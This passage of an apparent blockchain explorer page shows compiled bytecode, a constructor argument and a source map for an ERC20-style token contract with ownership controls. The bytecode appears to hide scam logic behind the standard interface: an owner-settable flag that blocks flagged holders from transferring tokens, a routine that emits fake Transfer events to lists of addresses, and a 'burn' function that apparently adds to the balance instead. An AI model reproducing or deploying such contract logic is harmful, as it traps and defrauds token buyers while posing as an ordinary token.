6116a9878288016114cf565b945094505060206116bc878288016113ff565b92505060406116cd87828801611435565b91505092959194509250565b6000602082840312156116ef576116ee6113ac565b5b60006116fd84828501611435565b91505092915050565b60006020828403121561171c5761171b6113ac565b5b600061172a848285016113ff565b91505092915050565b61173c816113d6565b82525050565b60006020820190506117576000830184611733565b92915050565b60008060408385031215611774576117736113ac565b5b6000611782858286016113ff565b9250506020611793858286016113ff565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806117e457607f821691505b6020821081036117f7576117f661179d565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061186682611414565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036118985761189761182c565b5b600182019050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b60006118ff602883611305565b915061190a826118a3565b604082019050919050565b6000602082019050818103600083015261192e816118f2565b9050919050565b600061194082611414565b915061194b83611414565b92508282019050808211156119635761196261182c565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006119c5602583611305565b91506119d082611969565b604082019050919050565b600060208201905081810360008301526119f4816119b8565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611a57602683611305565b9150611a62826119fb565b604082019050919050565b60006020820190508181036000830152611a8681611a4a565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611ae9602483611305565b9150611af482611a8d565b604082019050919050565b60006020820190508181036000830152611b1881611adc565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611b7b602283611305565b9150611b8682611b1f565b604082019050919050565b60006020820190508181036000830152611baa81611b6e565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611be7602083611305565b9150611bf282611bb1565b602082019050919050565b60006020820190508181036000830152611c1681611bda565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74207a65726f0000000000600082015250565b6000611c53601b83611305565b9150611c5e82611c1d565b602082019050919050565b60006020820190508181036000830152611c8281611c46565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611ce5602583611305565b9150611cf082611c89565b604082019050919050565b60006020820190508181036000830152611d1481611cd8565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611d77602383611305565b9150611d8282611d1b565b604082019050919050565b60006020820190508181036000830152611da681611d6a565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611e09602683611305565b9150611e1482611dad565b604082019050919050565b60006020820190508181036000830152611e3881611dfc565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b6000611e9b602183611305565b9150611ea682611e3f565b604082019050919050565b60006020820190508181036000830152611eca81611e8e565b9050919050565b7f45524332303a206275726e20616d6f756e7420657863656564732062616c616e60008201527f6365000000000000000000000000000000000000000000000000000000000000602082015250565b6000611f2d602283611305565b9150611f3882611ed1565b604082019050919050565b60006020820190508181036000830152611f5c81611f20565b905091905056fea2646970667358221220816e9562fbaecca5aa178af1255ed390658b76a7ec27d8c2ed056016262986af64736f6c6343000812003300000000000000000000000013766d16d2983a898899ffbc569cabf467ca37a2

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101165760003560e01c806370a08231116100a2578063a457c2d711610071578063a457c2d7146102cf578063a9059cbb146102ff578063dd62ed3e1461032f578063f2fde38b1461035f578063f55332ab1461037b57610116565b806370a0823114610259578063715018a6146102895780638da5cb5b1461029357806395d89b41146102b157610116565b806323b872dd116100e957806323b872dd146101a3578063313ce567146101d357806339509351146101f15780633a61363a1461022157806342966c681461023d57610116565b806306fdde031461011b578063095ea7b3146101395780631111f43f1461016957806318160ddd14610185575b600080fd5b6101236103ab565b604051610130919061138a565b60405180910390f35b610153600480360381019061014e919061144a565b61043d565b60405161016091906114a5565b60405180910390f35b610183600480360381019061017e9190611551565b61045b565b005b61018d610508565b60405161019a91906115c0565b60405180910390f35b6101bd60048036038101906101b891906115db565b610512565b6040516101ca91906114a5565b60405180910390f35b6101db61060a565b6040516101e8919061164a565b60405180910390f35b61020b6004803603810190610206919061144a565b610613565b60405161021891906114a5565b60405180910390f35b61023b60048036038101906102369190611665565b6106bf565b005b610257600480360381019061025291906116d9565b61077b565b005b610273600480360381019061026e9190611706565b610797565b60405161028091906115c0565b60405180910390f35b6102916107e0565b005b61029b6107f4565b6040516102a89190611742565b60405180910390f35b6102b961081e565b6040516102c6919061138a565b60405180910390f35b6102e960048036038101906102e4919061144a565b6108b0565b6040516102f691906114a5565b60405180910390f35b6103196004803603810190610314919061144a565b61099b565b60405161032691906114a5565b60405180910390f35b6103496004803603810190610344919061175d565b6109b9565b60405161035691906115c0565b60405180910390f35b61037960048036038101906103749190611706565b610a40565b005b61039560048036038101906103909190611706565b610ac3565b6040516103a291906114a5565b60405180910390f35b6060600680546103ba906117cc565b80601f01602080910402602001604051908101604052809291908181526020018280546103e6906117cc565b80156104335780601f1061040857610100808354040283529160200191610433565b820191906000526020600020905b81548152906001019060200180831161041657829003601f168201915b5050505050905090565b600061045161044a610b19565b8484610b21565b6001905092915050565b610463610cea565b60005b83839050811015610502578160046000868685818110610489576104886117fd565b5b905060200201602081019061049e9190611706565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806104fa9061185b565b915050610466565b50505050565b6000600854905090565b600061051f848484610d7e565b6000600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061056a610b19565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050828110156105ea576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105e190611915565b60405180910390fd5b6105fe856105f6610b19565b858403610b21565b60019150509392505050565b60006009905090565b60006106b5610620610b19565b84846003600061062e610b19565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546106b09190611935565b610b21565b6001905092915050565b6106c7610cea565b60005b84849050811015610774578484828181106106e8576106e76117fd565b5b90506020020160208101906106fd9190611706565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161075991906115c0565b60405180910390a3808061076c9061185b565b9150506106ca565b5050505050565b610783610cea565b61079461078e610b19565b8261108d565b50565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6107e8610cea565b6107f26000611234565b565b6000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606005805461082d906117cc565b80601f0160208091040260200160405190810160405280929190818152602001828054610859906117cc565b80156108a65780601f1061087b576101008083540402835291602001916108a6565b820191906000526020600020905b81548152906001019060200180831161088957829003601f168201915b5050505050905090565b600080600360006108bf610b19565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508281101561097c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610973906119db565b60405180910390fd5b610990610987610b19565b85858403610b21565b600191505092915050565b60006109af6109a8610b19565b8484610d7e565b6001905092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610a48610cea565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610ab7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aae90611a6d565b60405180910390fd5b610ac081611234565b50565b6000600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b90576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b8790611aff565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610bff576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bf690611b91565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610cdd91906115c0565b60405180910390a3505050565b600080610cf5610b19565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16610d7c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d7390611bfd565b60405180910390fd5b565b60008111610dc1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610db890611c69565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610e30576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e2790611cfb565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e9f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e9690611d8d565b60405180910390fd5b6000600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610f26576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f1d90611e1f565b60405180910390fd5b600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615610f865760008214610f8557600080fd5b5b818103600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461101b9190611935565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161107f91906115c0565b60405180910390a350505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036110fc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110f390611eb1565b60405180910390fd5b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811115611183576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161117a90611f43565b60405180910390fd5b818101600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161122791906115c0565b60405180910390a3505050565b6000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611334578082015181840152602081019050611319565b60008484015250505050565b6000601f19601f8301169050919050565b600061135c826112fa565b6113668185611305565b9350611376818560208601611316565b61137f81611340565b840191505092915050565b600060208201905081810360008301526113a48184611351565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006113e1826113b6565b9050919050565b6113f1816113d6565b81146113fc57600080fd5b50565b60008135905061140e816113e8565b92915050565b6000819050919050565b61142781611414565b811461143257600080fd5b50565b6000813590506114448161141e565b92915050565b60008060408385031215611461576114606113ac565b5b600061146f858286016113ff565b925050602061148085828601611435565b9150509250929050565b60008115159050919050565b61149f8161148a565b82525050565b60006020820190506114ba6000830184611496565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126114e5576114e46114c0565b5b8235905067ffffffffffffffff811115611502576115016114c5565b5b60208301915083602082028301111561151e5761151d6114ca565b5b9250929050565b61152e8161148a565b811461153957600080fd5b50565b60008135905061154b81611525565b92915050565b60008060006040848603121561156a576115696113ac565b5b600084013567ffffffffffffffff811115611588576115876113b1565b5b611594868287016114cf565b935093505060206115a78682870161153c565b9150509250925092565b6115ba81611414565b82525050565b60006020820190506115d560008301846115b1565b92915050565b6000806000606084860312156115f4576115f36113ac565b5b6000611602868287016113ff565b9350506020611613868287016113ff565b925050604061162486828701611435565b9150509250925092565b600060ff82169050919050565b6116448161162e565b82525050565b600060208201905061165f600083018461163b565b92915050565b6000806000806060858703121561167f5761167e6113ac565b5b600085013567ffffffffffffffff81111561169d5761169c6113b1565b5b6116a9878288016114cf565b945094505060206116bc878288016113ff565b92505060406116cd87828801611435565b91505092959194509250565b6000602082840312156116ef576116ee6113ac565b5b60006116fd84828501611435565b91505092915050565b60006020828403121561171c5761171b6113ac565b5b600061172a848285016113ff565b91505092915050565b61173c816113d6565b82525050565b60006020820190506117576000830184611733565b92915050565b60008060408385031215611774576117736113ac565b5b6000611782858286016113ff565b9250506020611793858286016113ff565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806117e457607f821691505b6020821081036117f7576117f661179d565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061186682611414565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036118985761189761182c565b5b600182019050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b60006118ff602883611305565b915061190a826118a3565b604082019050919050565b6000602082019050818103600083015261192e816118f2565b9050919050565b600061194082611414565b915061194b83611414565b92508282019050808211156119635761196261182c565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006119c5602583611305565b91506119d082611969565b604082019050919050565b600060208201905081810360008301526119f4816119b8565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611a57602683611305565b9150611a62826119fb565b604082019050919050565b60006020820190508181036000830152611a8681611a4a565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611ae9602483611305565b9150611af482611a8d565b604082019050919050565b60006020820190508181036000830152611b1881611adc565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611b7b602283611305565b9150611b8682611b1f565b604082019050919050565b60006020820190508181036000830152611baa81611b6e565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611be7602083611305565b9150611bf282611bb1565b602082019050919050565b60006020820190508181036000830152611c1681611bda565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74207a65726f0000000000600082015250565b6000611c53601b83611305565b9150611c5e82611c1d565b602082019050919050565b60006020820190508181036000830152611c8281611c46565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611ce5602583611305565b9150611cf082611c89565b604082019050919050565b60006020820190508181036000830152611d1481611cd8565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611d77602383611305565b9150611d8282611d1b565b604082019050919050565b60006020820190508181036000830152611da681611d6a565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611e09602683611305565b9150611e1482611dad565b604082019050919050565b60006020820190508181036000830152611e3881611dfc565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b6000611e9b602183611305565b9150611ea682611e3f565b604082019050919050565b60006020820190508181036000830152611eca81611e8e565b9050919050565b7f45524332303a206275726e20616d6f756e7420657863656564732062616c616e60008201527f6365000000000000000000000000000000000000000000000000000000000000602082015250565b6000611f2d602283611305565b9150611f3882611ed1565b604082019050919050565b60006020820190508181036000830152611f5c81611f20565b905091905056fea2646970667358221220816e9562fbaecca5aa178af1255ed390658b76a7ec27d8c2ed056016262986af64736f6c63430008120033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

00000000000000000000000013766d16d2983a898899ffbc569cabf467ca37a2

-----Decoded View---------------
Arg [0] : _reserve (address): 0x13766d16D2983A898899FFbc569CAbf467cA37a2

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 00000000000000000000000013766d16d2983a898899ffbc569cabf467ca37a2


Deployed Bytecode Sourcemap

133:8382:1:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1073:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2648:149;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8324:186;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;1487:102;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3542:426;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1291:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4989:190;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7204:185;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;7664:92;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;1767:121;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1173:103:3;;;:::i;:::-;;942:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;876:98:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4286:370;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2168:165;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3085:133;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1284:201:3;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;7397:107:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1073:94;1127:13;1156:5;1149:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1073:94;:::o;2648:149::-;2726:4;2739:34;2748:12;:10;:12::i;:::-;2762:2;2766:6;2739:8;:34::i;:::-;2787:4;2780:11;;2648:149;;;;:::o;8324:186::-;901:13:3;:11;:13::i;:::-;8407:9:1::1;8402:103;8426:4;;:11;;8422:1;:15;8402:103;;;8494:3;8459:23;:32;8483:4;;8488:1;8483:7;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;8459:32;;;;;;;;;;;;;;;;:38;;;;;;;;;;;;;;;;;;8439:3;;;;;:::i;:::-;;;;8402:103;;;;8324:186:::0;;;:::o;1487:102::-;1548:7;1571:12;;1564:19;;1487:102;:::o;3542:426::-;3648:4;3661:36;3671:6;3679:9;3690:6;3661:9;:36::i;:::-;3706:24;3733:11;:19;3745:6;3733:19;;;;;;;;;;;;;;;:33;3753:12;:10;:12::i;:::-;3733:33;;;;;;;;;;;;;;;;3706:60;;3801:6;3781:16;:26;;3773:79;;;;;;;;;;;;:::i;:::-;;;;;;;;;3878:57;3887:6;3895:12;:10;:12::i;:::-;3928:6;3909:16;:25;3878:8;:57::i;:::-;3958:4;3951:11;;;3542:426;;;;;:::o;1291:94::-;1349:5;453:1;1363:16;;1291:94;:::o;4989:190::-;5072:4;5085:70;5094:12;:10;:12::i;:::-;5108:2;5144:10;5112:11;:25;5124:12;:10;:12::i;:::-;5112:25;;;;;;;;;;;;;;;:29;5138:2;5112:29;;;;;;;;;;;;;;;;:42;;;;:::i;:::-;5085:8;:70::i;:::-;5169:4;5162:11;;4989:190;;;;:::o;7204:185::-;901:13:3;:11;:13::i;:::-;7298:9:1::1;7293:91;7317:4;;:11;;7313:1;:15;7293:91;;;7363:4;;7368:1;7363:7;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;7351:25;;7360:1;7351:25;;;7372:3;7351:25;;;;;;:::i;:::-;;;;;;;;7330:3;;;;;:::i;:::-;;;;7293:91;;;;7204:185:::0;;;;:::o;7664:92::-;901:13:3;:11;:13::i;:::-;7723:27:1::1;7729:12;:10;:12::i;:::-;7743:6;7723:5;:27::i;:::-;7664:92:::0;:::o;1767:121::-;1841:7;1864:9;:18;1874:7;1864:18;;;;;;;;;;;;;;;;1857:25;;1767:121;;;:::o;1173:103:3:-;901:13;:11;:13::i;:::-;1238:30:::1;1265:1;1238:18;:30::i;:::-;1173:103::o:0;942:87::-;988:7;1015:6;;;;;;;;;;;1008:13;;942:87;:::o;876:98:1:-;932:13;961:7;954:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;876:98;:::o;4286:370::-;4374:4;4387:24;4414:11;:25;4426:12;:10;:12::i;:::-;4414:25;;;;;;;;;;;;;;;:29;4440:2;4414:29;;;;;;;;;;;;;;;;4387:56;;4478:15;4458:16;:35;;4450:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;4561:62;4570:12;:10;:12::i;:::-;4584:2;4607:15;4588:16;:34;4561:8;:62::i;:::-;4646:4;4639:11;;;4286:370;;;;:::o;2168:165::-;2254:4;2267:42;2277:12;:10;:12::i;:::-;2291:9;2302:6;2267:9;:42::i;:::-;2323:4;2316:11;;2168:165;;;;:::o;3085:133::-;3168:7;3191:11;:17;3203:4;3191:17;;;;;;;;;;;;;;;:21;3209:2;3191:21;;;;;;;;;;;;;;;;3184:28;;3085:133;;;;:::o;1284:201:3:-;901:13;:11;:13::i;:::-;1393:1:::1;1373:22;;:8;:22;;::::0;1365:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;1449:28;1468:8;1449:18;:28::i;:::-;1284:201:::0;:::o;7397:107:1:-;7447:4;7467:23;:31;7491:6;7467:31;;;;;;;;;;;;;;;;;;;;;;;;;7460:38;;7397:107;;;:::o;646:98:0:-;699:7;726:10;719:17;;646:98;:::o;8014:304:1:-;8122:1;8106:18;;:4;:18;;;8098:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;8194:1;8180:16;;:2;:16;;;8172:63;;;;;;;;;;;;:::i;:::-;;;;;;;;;8268:6;8244:11;:17;8256:4;8244:17;;;;;;;;;;;;;;;:21;8262:2;8244:21;;;;;;;;;;;;;;;:30;;;;8301:2;8286:26;;8295:4;8286:26;;;8305:6;8286:26;;;;;;:::i;:::-;;;;;;;;8014:304;;;:::o;1037:128:3:-;1101:5;:19;1107:12;:10;:12::i;:::-;1101:19;;;;;;;;;;;;;;;;;;;;;;;;;1093:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;1037:128::o;5435:677:1:-;5546:1;5537:6;:10;5529:50;;;;;;;;;;;;:::i;:::-;;;;;;;;;5612:1;5594:20;;:6;:20;;;5586:70;;;;;;;;;;;;:::i;:::-;;;;;;;;;5692:1;5671:23;;:9;:23;;;5663:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;5743:21;5767:9;:17;5777:6;5767:17;;;;;;;;;;;;;;;;5743:41;;5816:6;5799:13;:23;;5791:74;;;;;;;;;;;;:::i;:::-;;;;;;;;;5875:23;:31;5899:6;5875:31;;;;;;;;;;;;;;;;;;;;;;;;;5872:74;;;5936:1;5926:6;:11;5918:20;;;;;;5872:74;6007:6;5991:13;:22;5971:9;:17;5981:6;5971:17;;;;;;;;;;;;;;;:42;;;;6051:6;6027:9;:20;6037:9;6027:20;;;;;;;;;;;;;;;;:30;;;;;;;:::i;:::-;;;;;;;;6088:9;6071:35;;6080:6;6071:35;;;6099:6;6071:35;;;;;;:::i;:::-;;;;;;;;5522:590;5435:677;;;:::o;6787:407::-;6890:1;6871:21;;:7;:21;;;6863:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;6943:22;6968:9;:18;6978:7;6968:18;;;;;;;;;;;;;;;;6943:43;;7023:6;7005:14;:24;;6997:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;7128:6;7111:14;:23;7090:9;:18;7100:7;7090:18;;;;;;;;;;;;;;;:44;;;;7177:1;7151:37;;7160:7;7151:37;;;7181:6;7151:37;;;;;;:::i;:::-;;;;;;;;6852:342;6787:407;;:::o;1493:191:3:-;1567:16;1586:6;;;;;;;;;;;1567:25;;1612:8;1603:6;;:17;;;;;;;;;;;;;;;;;;1667:8;1636:40;;1657:8;1636:40;;;;;;;;;;;;1556:128;1493:191;:::o;7:99:4:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1553:117;1662:1;1659;1652:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:117::-;3555:1;3552;3545:12;3569:117;3678:1;3675;3668:12;3692:117;3801:1;3798;3791:12;3832:568;3905:8;3915:6;3965:3;39